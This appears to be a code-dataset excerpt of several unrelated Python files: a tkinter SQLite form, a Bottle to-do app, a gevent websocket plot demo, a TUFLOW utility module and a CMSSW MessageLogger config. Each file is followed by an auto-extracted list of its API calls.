QtCore, Qt\n'), ((2778, 2800), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(500)', '(500)'], {}), '(500, 500)\n', (2790, 2800), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1420, 1445), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (1436, 1445), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1586, 1621), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {'size': '(789)'}), '(int_val, size=789)\n', (1602, 1621), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1694, 1729), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {'size': '(3.0)'}), '(int_val, size=3.0)\n', (1710, 1729), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2062, 2112), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""(width, height)"""'}), "(ValueError, 
match='(width, height)')\n", (2075, 2112), False, 'import pytest\n'), ((2240, 2265), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2256, 2265), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2356, 2381), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2372, 2381), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2570, 2595), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2586, 2595), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2690, 2715), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2706, 2715), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2727, 2749), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(500)', '(500)'], {}), '(500, 500)\n', (2739, 2749), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2858, 2908), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""(width, height)"""'}), "(ValueError, match='(width, height)')\n", (2871, 2908), False, 'import pytest\n'), ((956, 978), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['path'], {}), '(path)\n', (972, 978), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1934, 1954), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(50)', '(50)'], {}), '(50, 50)\n', (1946, 1954), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2138, 2174), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {'size': 'size'}), '(int_val, size=size)\n', (2154, 2174), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2934, 2959), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (2950, 2959), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n')] |
from tkinter import *
import tkinter.font as font
import sqlite3
name2=''
regis2=''
branch2=''
def main():
inp=Tk()
inp.geometry("430x300")
inp.title("Enter The Details")
inp.iconbitmap("logo/spectrumlogo.ico")
f=font.Font(family='Bookman Old Style',size=15,weight='bold')
f1=font.Font(family='Bookman Old Style',size=20,weight='bold')
global n2
global reg2
global b2
det=Label(inp,text=" Enter The Details\n",font=f1,fg='magenta')
det.grid(row=0,column=0,columnspan=2)
n1=Label(inp,text=" Name:",font=f)
n1.grid(row=1,column=0)
n2=Entry(inp,width=40)
n2.grid(row=1,column=1)
reg1=Label(inp,text="Registration ID:",font=f)
reg1.grid(row=2,column=0)
reg2=Entry(inp,width=40)
reg2.grid(row=2,column=1)
b1=Label(inp,text=" Branch:",font=f)
b1.grid(row=3,column=0)
b2=Entry(inp,width=40)
b2.grid(row=3,column=1)
invalid=Label(inp,text=' ',fg='red')
invalid.grid(row=4,columnspan=2)
def submit():
name2=n2.get()
regis2=reg2.get()
branch2=b2.get()
l=[name2,regis2,branch2]
if (None in l or "" in l):
invalid['text']="Please fill all the fields"
else:
db=sqlite3.connect("mark_list.db")
#cursor
c=db.cursor()
#insert into tabels
c.execute("""UPDATE mark_list SET name=? WHERE name=?""",(name2,' '))
c.execute("""UPDATE mark_list SET registration_no=? WHERE registration_no=?""",(regis2,' '))
c.execute("""UPDATE mark_list SET branch=? WHERE branch=?""",(branch2,' '))
#commit_changes
db.commit()
#close connection
db.close()
inp.destroy()
import subject
subject.main()
def back():
db=sqlite3.connect("mark_list.db")
#cursor
c=db.cursor()
c.execute("""DELETE from mark_list where name=' '""")
#commit_changes
db.commit()
#close connection
db.close()
inp.destroy()
import welcome
welcome.main()
#buttons
sub1=Button(inp,text="Submit",borderwidth=3,padx=40,font=f,bg='green',command=submit)
sub1.grid(row=5,column=0,columnspan=2)
back1=Button(inp,text="Back",borderwidth=3,padx=20,font=f,bg='red',command=back)
back1.grid(row=6,column=0,columnspan=2)
inp.mainloop()
if __name__=='__main__':
main()
| [
"tkinter.font.Font",
"subject.main",
"sqlite3.connect",
"welcome.main"
]
| [((251, 312), 'tkinter.font.Font', 'font.Font', ([], {'family': '"""Bookman Old Style"""', 'size': '(15)', 'weight': '"""bold"""'}), "(family='Bookman Old Style', size=15, weight='bold')\n", (260, 312), True, 'import tkinter.font as font\n'), ((319, 380), 'tkinter.font.Font', 'font.Font', ([], {'family': '"""Bookman Old Style"""', 'size': '(20)', 'weight': '"""bold"""'}), "(family='Bookman Old Style', size=20, weight='bold')\n", (328, 380), True, 'import tkinter.font as font\n'), ((2002, 2033), 'sqlite3.connect', 'sqlite3.connect', (['"""mark_list.db"""'], {}), "('mark_list.db')\n", (2017, 2033), False, 'import sqlite3\n'), ((2306, 2320), 'welcome.main', 'welcome.main', ([], {}), '()\n', (2318, 2320), False, 'import welcome\n'), ((1369, 1400), 'sqlite3.connect', 'sqlite3.connect', (['"""mark_list.db"""'], {}), "('mark_list.db')\n", (1384, 1400), False, 'import sqlite3\n'), ((1956, 1970), 'subject.main', 'subject.main', ([], {}), '()\n', (1968, 1970), False, 'import subject\n')] |
import sqlite3
from bottle import route, run,debug,template,request,redirect
@route('/todo')
def todo_list():
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("SELECT id, task FROM todo WHERE status LIKE '1'")
result = c.fetchall()
c.close()
output = template('make_table', rows=result)
return output
@route('/new', method='GET')
def new_item():
if request.GET.save:
new = request.GET.task.strip()
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("INSERT INTO todo (task,status) VALUES (?,?)", (new,1))
new_id = c.lastrowid
conn.commit()
c.close()
redirect('/todo')
#return '<p>The new task was inserted into the database, the ID is %s</p>' % new_id
else:
return template('new_task.tpl')
@route('/do_insert' , method='GET')
def get_id():
redirect('/new')
@route('/edit/<no:int>', method='GET')
def edit_item(no):
if request.GET.save:
edit = request.GET.task.strip()
status = request.GET.status.strip()
if status == 'open':
status = 1
else:
status = 0
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("UPDATE todo SET task = ?, status = ? WHERE id LIKE ?", (edit, status, no))
conn.commit()
return '<p>The item number %s was successfully updated</p>' % no
else:
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("SELECT task FROM todo WHERE id LIKE ?", (str(no)))
cur_data = c.fetchone()
return template('edit_task', old=cur_data, no=no)
@route('/find_edit' , method='GET')
def get_id():
id_edit = request.GET.editdata.strip()
redirect('/edit/' + id_edit)
@route('/delete/<no:int>', method='GET')
def delete_item(no):
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("DELETE FROM todo WHERE id LIKE ?", (str(no)))
conn.commit()
redirect('/todo')
@route('/find_delete' , method='GET')
def get_id():
id_delete = request.GET.deletedata.strip()
redirect('/delete/' + id_delete)
debug(True)
run(reloader=True)
| [
"bottle.template",
"bottle.request.GET.deletedata.strip",
"sqlite3.connect",
"bottle.request.GET.status.strip",
"bottle.route",
"bottle.request.GET.task.strip",
"bottle.debug",
"bottle.request.GET.editdata.strip",
"bottle.run",
"bottle.redirect"
]
| [((79, 93), 'bottle.route', 'route', (['"""/todo"""'], {}), "('/todo')\n", (84, 93), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((347, 374), 'bottle.route', 'route', (['"""/new"""'], {'method': '"""GET"""'}), "('/new', method='GET')\n", (352, 374), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((837, 870), 'bottle.route', 'route', (['"""/do_insert"""'], {'method': '"""GET"""'}), "('/do_insert', method='GET')\n", (842, 870), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((917, 954), 'bottle.route', 'route', (['"""/edit/<no:int>"""'], {'method': '"""GET"""'}), "('/edit/<no:int>', method='GET')\n", (922, 954), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1669, 1702), 'bottle.route', 'route', (['"""/find_edit"""'], {'method': '"""GET"""'}), "('/find_edit', method='GET')\n", (1674, 1702), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1804, 1843), 'bottle.route', 'route', (['"""/delete/<no:int>"""'], {'method': '"""GET"""'}), "('/delete/<no:int>', method='GET')\n", (1809, 1843), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2043, 2078), 'bottle.route', 'route', (['"""/find_delete"""'], {'method': '"""GET"""'}), "('/find_delete', method='GET')\n", (2048, 2078), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2183, 2194), 'bottle.debug', 'debug', (['(True)'], {}), '(True)\n', (2188, 2194), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2195, 2213), 'bottle.run', 'run', ([], {'reloader': '(True)'}), '(reloader=True)\n', (2198, 2213), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((122, 148), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (137, 148), False, 'import sqlite3\n'), ((289, 324), 'bottle.template', 'template', (['"""make_table"""'], {'rows': 'result'}), "('make_table', rows=result)\n", (297, 324), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((890, 906), 'bottle.redirect', 'redirect', (['"""/new"""'], {}), "('/new')\n", (898, 906), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1732, 1760), 'bottle.request.GET.editdata.strip', 'request.GET.editdata.strip', ([], {}), '()\n', (1758, 1760), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1765, 1793), 'bottle.redirect', 'redirect', (["('/edit/' + id_edit)"], {}), "('/edit/' + id_edit)\n", (1773, 1793), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1879, 1905), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (1894, 1905), False, 'import sqlite3\n'), ((2023, 2040), 'bottle.redirect', 'redirect', (['"""/todo"""'], {}), "('/todo')\n", (2031, 2040), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2110, 2140), 'bottle.request.GET.deletedata.strip', 'request.GET.deletedata.strip', ([], {}), '()\n', (2138, 2140), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2145, 2177), 'bottle.redirect', 'redirect', (["('/delete/' + id_delete)"], {}), "('/delete/' + id_delete)\n", (2153, 2177), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((430, 454), 'bottle.request.GET.task.strip', 'request.GET.task.strip', ([], {}), '()\n', (452, 454), False, 'from bottle 
import route, run, debug, template, request, redirect\n'), ((470, 496), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (485, 496), False, 'import sqlite3\n'), ((674, 691), 'bottle.redirect', 'redirect', (['"""/todo"""'], {}), "('/todo')\n", (682, 691), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((809, 833), 'bottle.template', 'template', (['"""new_task.tpl"""'], {}), "('new_task.tpl')\n", (817, 833), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1014, 1038), 'bottle.request.GET.task.strip', 'request.GET.task.strip', ([], {}), '()\n', (1036, 1038), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1056, 1082), 'bottle.request.GET.status.strip', 'request.GET.status.strip', ([], {}), '()\n', (1080, 1082), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1187, 1213), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (1202, 1213), False, 'import sqlite3\n'), ((1454, 1480), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (1469, 1480), False, 'import sqlite3\n'), ((1624, 1666), 'bottle.template', 'template', (['"""edit_task"""'], {'old': 'cur_data', 'no': 'no'}), "('edit_task', old=cur_data, no=no)\n", (1632, 1666), False, 'from bottle import route, run, debug, template, request, redirect\n')] |
from __future__ import print_function
"""
This example generates random data and plots a graph in the browser.
Run it using Gevent directly using:
$ python plot_graph.py
Or with an Gunicorn wrapper:
$ gunicorn -k "geventwebsocket.gunicorn.workers.GeventWebSocketWorker" \
plot_graph:resource
"""
import gevent
import random
from geventwebsocket import WebSocketServer, WebSocketApplication, Resource
from geventwebsocket._compat import range_type
class PlotApplication(WebSocketApplication):
def on_open(self):
for i in range_type(10000):
self.ws.send("0 %s %s\n" % (i, random.random()))
gevent.sleep(0.1)
def on_close(self, reason):
print("Connection Closed!!!", reason)
def static_wsgi_app(environ, start_response):
start_response("200 OK", [("Content-Type", "text/html")])
return open("plot_graph.html").readlines()
resource = Resource([
('/', static_wsgi_app),
('/data', PlotApplication)
])
if __name__ == "__main__":
server = WebSocketServer(('', 8000), resource, debug=True)
server.serve_forever()
| [
"gevent.sleep",
"geventwebsocket.WebSocketServer",
"geventwebsocket._compat.range_type",
"random.random",
"geventwebsocket.Resource"
]
| [((914, 976), 'geventwebsocket.Resource', 'Resource', (["[('/', static_wsgi_app), ('/data', PlotApplication)]"], {}), "([('/', static_wsgi_app), ('/data', PlotApplication)])\n", (922, 976), False, 'from geventwebsocket import WebSocketServer, WebSocketApplication, Resource\n'), ((1028, 1077), 'geventwebsocket.WebSocketServer', 'WebSocketServer', (["('', 8000)", 'resource'], {'debug': '(True)'}), "(('', 8000), resource, debug=True)\n", (1043, 1077), False, 'from geventwebsocket import WebSocketServer, WebSocketApplication, Resource\n'), ((555, 572), 'geventwebsocket._compat.range_type', 'range_type', (['(10000)'], {}), '(10000)\n', (565, 572), False, 'from geventwebsocket._compat import range_type\n'), ((647, 664), 'gevent.sleep', 'gevent.sleep', (['(0.1)'], {}), '(0.1)\n', (659, 664), False, 'import gevent\n'), ((617, 632), 'random.random', 'random.random', ([], {}), '()\n', (630, 632), False, 'import random\n')] |
"""
Summary:
Utility Functions that could be helpful in any part of the API.
All functions that are likely to be called across a number of classes
and Functions in the API should be grouped here for convenience.
Author:
<NAME>
Created:
01 Apr 2016
Copyright:
<NAME> 2016
TODO: This module, like a lot of others probably, needs reviewing for how
    'Pythonic' it is. There are a lot of places where generators,
comprehensions, maps, etc should be used to speed things up and make
them a bit clearer.
More importantly there are a lot of places using '==' compare that
should be using 'in' etc. This could cause bugs and must be fixed
soon.
Updates:
"""
from __future__ import unicode_literals
import re
import os
import operator
import logging
logger = logging.getLogger(__name__)
"""logging references with a __name__ set to this module."""
# def resolveSeDecorator(se_vals, path):
# """Decorator function for replacing Scen/Evt placholders.
#
# Checks fro scenario and event placeholders in the return value of a
# function and replaces them with corresponding values if found.
#
# Args:
# se_vals(dict): standard scenario/event dictionary in the format:
# {'scenario': {
# """
# def seDecorator(func):
# def seWrapper(*args, **kwargs):
# result = func(*args, **kwargs)
#
# if '~' in result:
# # Check for scenarion stuff
# for key, val in self.se_vals['scenario'].items():
# temp = '~' + key + '~'
# if temp in result:
# result = result.replace(temp, val)
# # Check for event stuff
# for key, val in self.se_vals['event'].items():
# temp = '~' + key + '~'
# if temp in result:
# result = result.replace(temp, val)
# return result
# return seWrapper
# return seDecorator
def formatFloat(value, no_of_dps, ignore_empty_str=True):
"""Format a float as a string to given number of decimal places.
Args:
value(float): the value to format.
no_of_dps(int): number of decimal places to format to.
ignore_empty_str(True): return a stripped blank string if set to True.
Return:
str - the formatted float.
Raises:
ValueError - if value param is not type float.
"""
if ignore_empty_str and not isNumeric(value) and str(value).strip() == '':
return str(value).strip()
if not isNumeric(value):
raise ValueError
decimal_format = '%0.' + str(no_of_dps) + 'f'
value = decimal_format % float(value)
return value
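# Example usage of formatFloat (illustrative values, not from the original
# module): formatFloat(3.14159, 2) returns '3.14', while formatFloat('  ', 2)
# returns '' because blank strings pass through when ignore_empty_str is True.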
def checkFileType(file_path, ext):
"""Checks a file to see that it has the right extension.
Args:
file_path (str): The file path to check.
ext (List): list containing the extension types to match the file
against.
Returns:
True if the extension matches the ext variable given or False if not.
"""
file_ext = os.path.splitext(file_path)[1]
logger.info('File ext = ' + file_ext)
    for e in ext:
        if e == file_ext:
            return True
    # only report failure once every allowed extension has been checked
    return False
def isNumeric(s):
"""Tests if string is a number or not.
Simply tries to convert it and catches the error if launched.
Args:
s (str): string to test number compatibility.
Returns:
Bool - True if number. False if not.
"""
try:
float(s)
return True
except (ValueError, TypeError):
return False
def encodeStr(value):
try:
value = unicode(value, "utf-8")
return value
except (UnicodeDecodeError, NameError, TypeError):
return value
def isString(value):
"""Tests a given value to see if it is an instance of basestring or not.
Note:
This function should be used whenever testing this as it accounts for
both Python 2.7+ and 3.2+ variations of string.
Args:
value: the variable to test.
Returns:
Bool - True if value is a unicode str (basestring type)
"""
try:
return isinstance(value, basestring)
except NameError:
return isinstance(value, str)
# if not isinstance(value, basestring):
# return False
#
# return True
def isList(value):
"""Test a given value to see if it is a list or not.
Args:
value: the variable to test for list type.
Returns:
True if value is of type list; False otherwise.
"""
if not isinstance(value, list):
return False
return True
def arrayToString(str_array):
"""Convert a list to a String
Creates one string by adding each part of the array to one string using
', '.join()
Args:
str_array (List): to convert into single string.
Returns:
str - representaion of the array joined together.
Raises:
        ValueError: if the contents of the list are not all strings.
"""
    if not isString(str_array[0]):
        raise ValueError('Array values are not strings')
out_string = ''
out_string = ', '.join(str_array)
return out_string
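# Example usage of arrayToString with the module-level signature above
# (illustrative values): arrayToString(['5', '10', '15']) returns '5, 10, 15';
# a non-string first element raises ValueError.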
def findSubstringInList(substr, the_list):
"""Returns a list containing the indices that a substring was found at.
    Uses a list comprehension to quickly find all indices that substr appears in.
Args:
substr (str): the sub string to search for.
the_list (List): a list containing the strings to search.
Returns:
tuple - containing:
* a list with the indices that the substring was found in
(this list can be empty if no matches were found).
* an integer containing the number of elements it was found in.
"""
indices = [i for i, s in enumerate(the_list) if substr in s]
return indices, len(indices)
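# Example usage of findSubstringInList (illustrative values):
# findSubstringInList('csv', ['a.csv', 'b.txt', 'c.csv']) returns ([0, 2], 2),
# i.e. the indices of the matching entries and the number of matches.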
def findMax(val1, val2):
"""Returns tuple containing min, max of two values
Args:
val1: first integer or float.
val2: second integer or float.
Returns:
tuple - containing:
* lower value
* higher value
* False if not same or True if the same.
"""
if val1 == val2:
return val1, val2, True
elif val1 > val2:
return val2, val1, False
else:
return val1, val2, False
def fileExtensionWithoutPeriod(filepath, name_only=False):
"""Extracts the extension without '.' from filepath.
The extension will always be converted to lower case before returning.
Args:
filepath (str): A full filepath if name_only=False. Otherwise a file
name with extension if name_only=True.
name_only (bool): True if filepath is only filename.extension.
"""
if name_only:
file, ext = os.path.splitext(filepath)
else:
path, filename = os.path.split(filepath)
file, ext = os.path.splitext(filename)
ext = ext[1:]
return ext.lower()
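# Example usage of fileExtensionWithoutPeriod (illustrative paths):
# fileExtensionWithoutPeriod('C:/temp/results.ZZN') and
# fileExtensionWithoutPeriod('results.ZZN', name_only=True) both return 'zzn'.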
def findWholeWord(w):
"""Find a whole word amoungst a string."""
return re.compile(r'\b({0})\b'.format(w), flags=re.IGNORECASE).search
def convertRunOptionsToSEDict(options):
"""Converts tuflow command line options to scenario/event dict.
Tuflow uses command line option (e.g. -s1 blah -e1 blah) to set scenario
values which can either be provided on the command line or through the
FMP run form. The TuflowLoader can use these arguments but requires a
slightly different setup.
This function converts the command line string into the scenarion and
event dictionary expected by the TuflowLoader.
Args:
options(str): command line options.
Return:
dict - {'scenario': {'s1': blah}, 'event': {'e1': blah}}
Raises:
        AttributeError: if both -s and -s1 or -e and -e1 occur in the options
string. -x and -x1 are treated as the same variable by tuflow and
one of the values would be ignored.
"""
if ' -s ' in options and ' -s1 ' in options:
raise AttributeError
    if ' -e ' in options and ' -e1 ' in options:
raise AttributeError
outvals = {'scenario': {}, 'event': {}}
vals = options.split(" ")
for i in range(len(vals)):
if vals[i].startswith('-s'):
outvals['scenario'][vals[i][1:]] = vals[i + 1]
elif vals[i].startswith('-e'):
outvals['event'][vals[i][1:]] = vals[i + 1]
return outvals
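# Example usage of convertRunOptionsToSEDict (illustrative option string):
# convertRunOptionsToSEDict('-s1 BAS -e1 Q0100') returns
# {'scenario': {'s1': 'BAS'}, 'event': {'e1': 'Q0100'}}.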
def getSEResolvedFilename(filename, se_vals):
"""Replace a tuflow placeholder filename with the scenario/event values.
Replaces all of the placholder values (e.g. ~s1~_~e1~) in a tuflow
filename with the corresponding values provided in the run options string.
If the run options flags are not found in the filename their values will
be appended to the end of the string.
The setup of the returned filename is always the same:
- First replace all placeholders with corresponding flag values.
- s1 == s and e1 == e.
- Append additional e values to end with '_' before first and '+' before others.
- Append additional s values to end with '_' before first and '+' before others.
Args:
filename(str): the filename to update.
se_vals(str): the run options string containing the 's' and
'e' flags and their corresponding values.
Return:
str - the updated filename.
"""
if not 'scenario' in se_vals.keys():
se_vals['scenario'] = {}
if not 'event' in se_vals.keys():
se_vals['event'] = {}
# Format the key value pairs into a list and combine the scenario and
# event list together and sort them into e, e1, e2, s, s1, s2 order.
scen_keys = ['-' + a for a in se_vals['scenario'].keys()]
scen_vals = se_vals['scenario'].values()
event_keys = ['-' + a for a in se_vals['event'].keys()]
event_vals = se_vals['event'].values()
scen = [list(a) for a in zip(scen_keys, scen_vals)]
event = [list(a) for a in zip(event_keys, event_vals)]
se_vals = scen + event
vals = sorted(se_vals, key=operator.itemgetter(0))
# Build a new filename by replacing or adding the flag values
outname = filename
in_e = False
for v in vals:
placeholder = ''.join(['~', v[0][1:], '~'])
if placeholder in filename:
outname = outname.replace(placeholder, v[1])
elif v[0] == '-e1' and '~e~' in filename and not '-e' in se_vals:
outname = outname.replace('~e~', v[1])
elif v[0] == '-s1' and '~s~' in filename and not '-s' in se_vals:
outname = outname.replace('~s~', v[1])
# DEBUG - CHECK THIS IS TRUE!
elif v[0] == '-e' and '~e1~' in filename:
outname = outname.replace('~e1~', v[1])
elif v[0] == '-s' and '~s1~' in filename:
outname = outname.replace('~s1~', v[1])
else:
if v[0].startswith('-e'):
if not in_e:
prefix = '_'
else:
prefix = '+'
in_e = True
elif v[0].startswith('-s'):
if in_e:
prefix = '_'
else:
prefix = '+'
in_e = False
outname += prefix + v[1]
return outname
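# Example usage of getSEResolvedFilename (illustrative values): calling
# getSEResolvedFilename('results_~s1~_~e1~.dat',
#                       {'scenario': {'s1': 'BAS'}, 'event': {'e1': 'Q0100'}})
# returns 'results_BAS_Q0100.dat'; flags without a matching placeholder are
# appended to the end of the name instead.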
def enum(*sequential, **named):
"""Creates a new enum using the values handed to it.
Taken from <NAME> on StackOverflow:
http://stackoverflow.com/questions/36932/how-can-i-represent-an-enum-in-python
Examples:
Can be created and accessed using:
>>> Numbers = enum('ZERO', 'ONE', 'TWO')
>>> Numbers.ZERO
0
>>> Numbers.ONE
1
        Or reverse the process to get the name from the value:
        >>> Numbers.reverse_mapping[2]
        'TWO'
"""
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.items())
enums['reverse_mapping'] = reverse
return type(str('Enum'), (), enums)
class FileQueue(object):
"""Queueing class for storing data to go into the database
"""
def __init__(self):
self.items = []
def isEmpty(self):
"""Returns True if list is empty
"""
return self.items == []
def enqueue(self, item):
"""Add an item to the queue
"""
self.items.insert(0, item)
def dequeue(self):
"""Pop an item from the front of the queue.
"""
return self.items.pop()
def size(self):
"""Get the size of the queue
"""
return len(self.items)
class LoadStack(object):
"""Stack class for loading logic."""
def __init__(self, max_size=-1):
self.items = []
self.max_size = max_size
def isEmpty(self):
"""Return True if stack is empty."""
return self.items == []
def add(self, item):
"""Add an item to the stack.
Args:
item: the item to add to the stack.
Raises:
IndexError: if max_size has been set and adding another item would
make the stack bigger than max size.
"""
if not self.max_size == -1:
if len(self.items) + 1 > self.max_size:
raise IndexError
self.items.append(item)
def pop(self):
"""Get an item From the stack.
Return:
item from the top of the stack.
Raises:
IndexError: if the stack is empty.
"""
if len(self.items) == 0:
raise IndexError
return self.items.pop()
def peek(self):
"""See what the next item on the stack is, but don't remove it.
Return:
item from the top of the stack.
Raises:
IndexError: if the stack is empty.
"""
if len(self.items) == 0:
raise IndexError
return self.items[-1]
def size(self):
"""Return the number of items in the stack."""
return len(self.items)
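# Example usage of LoadStack (illustrative): a bounded stack refuses items
# beyond max_size.
# stack = LoadStack(max_size=2)
# stack.add('unit_1'); stack.add('unit_2')   # fills the stack
# stack.add('unit_3')                        # raises IndexError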
| [
"logging.getLogger",
"operator.itemgetter",
"os.path.splitext",
"os.path.split"
]
| [((902, 929), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (919, 929), False, 'import logging\n'), ((3281, 3308), 'os.path.splitext', 'os.path.splitext', (['file_path'], {}), '(file_path)\n', (3297, 3308), False, 'import os\n'), ((7209, 7235), 'os.path.splitext', 'os.path.splitext', (['filepath'], {}), '(filepath)\n', (7225, 7235), False, 'import os\n'), ((7273, 7296), 'os.path.split', 'os.path.split', (['filepath'], {}), '(filepath)\n', (7286, 7296), False, 'import os\n'), ((7318, 7344), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (7334, 7344), False, 'import os\n'), ((10597, 10619), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (10616, 10619), False, 'import operator\n')] |
# u28_cerr_cfg.py:
#
# Non-regression test configuration file for MessageLogger service:
# distinct threshold level for linked destination, where
#
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
import FWCore.Framework.test.cmsExceptionsFatal_cff
process.options = FWCore.Framework.test.cmsExceptionsFatal_cff.options
process.load("FWCore.MessageService.test.Services_cff")
process.MessageLogger = cms.Service("MessageLogger",
categories = cms.untracked.vstring('preEventProcessing'),
destinations = cms.untracked.vstring('cerr'),
statistics = cms.untracked.vstring('cerr_stats'),
cerr_stats = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING'),
output = cms.untracked.string('cerr')
),
u28_output = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
noTimeStamps = cms.untracked.bool(True),
preEventProcessing = cms.untracked.PSet(
limit = cms.untracked.int32(0)
)
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(3)
)
process.source = cms.Source("EmptySource")
process.sendSomeMessages = cms.EDAnalyzer("UnitTestClient_A")
process.p = cms.Path(process.sendSomeMessages)
| [
"FWCore.ParameterSet.Config.untracked.string",
"FWCore.ParameterSet.Config.Source",
"FWCore.ParameterSet.Config.untracked.int32",
"FWCore.ParameterSet.Config.Process",
"FWCore.ParameterSet.Config.untracked.vstring",
"FWCore.ParameterSet.Config.untracked.bool",
"FWCore.ParameterSet.Config.Path",
"FWCore.ParameterSet.Config.EDAnalyzer"
]
| [((201, 220), 'FWCore.ParameterSet.Config.Process', 'cms.Process', (['"""TEST"""'], {}), "('TEST')\n", (212, 220), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1107, 1132), 'FWCore.ParameterSet.Config.Source', 'cms.Source', (['"""EmptySource"""'], {}), "('EmptySource')\n", (1117, 1132), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1161, 1195), 'FWCore.ParameterSet.Config.EDAnalyzer', 'cms.EDAnalyzer', (['"""UnitTestClient_A"""'], {}), "('UnitTestClient_A')\n", (1175, 1195), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1209, 1243), 'FWCore.ParameterSet.Config.Path', 'cms.Path', (['process.sendSomeMessages'], {}), '(process.sendSomeMessages)\n', (1217, 1243), True, 'import FWCore.ParameterSet.Config as cms\n'), ((473, 516), 'FWCore.ParameterSet.Config.untracked.vstring', 'cms.untracked.vstring', (['"""preEventProcessing"""'], {}), "('preEventProcessing')\n", (494, 516), True, 'import FWCore.ParameterSet.Config as cms\n'), ((537, 566), 'FWCore.ParameterSet.Config.untracked.vstring', 'cms.untracked.vstring', (['"""cerr"""'], {}), "('cerr')\n", (558, 566), True, 'import FWCore.ParameterSet.Config as cms\n'), ((585, 620), 'FWCore.ParameterSet.Config.untracked.vstring', 'cms.untracked.vstring', (['"""cerr_stats"""'], {}), "('cerr_stats')\n", (606, 620), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1064, 1086), 'FWCore.ParameterSet.Config.untracked.int32', 'cms.untracked.int32', (['(3)'], {}), '(3)\n', (1083, 1086), True, 'import FWCore.ParameterSet.Config as cms\n'), ((679, 710), 'FWCore.ParameterSet.Config.untracked.string', 'cms.untracked.string', (['"""WARNING"""'], {}), "('WARNING')\n", (699, 710), True, 'import FWCore.ParameterSet.Config as cms\n'), ((729, 757), 'FWCore.ParameterSet.Config.untracked.string', 'cms.untracked.string', (['"""cerr"""'], {}), "('cerr')\n", (749, 757), True, 'import FWCore.ParameterSet.Config as cms\n'), ((822, 850), 'FWCore.ParameterSet.Config.untracked.string', 'cms.untracked.string', (['"""INFO"""'], {}), "('INFO')\n", (842, 850), True, 'import FWCore.ParameterSet.Config as cms\n'), ((875, 899), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', 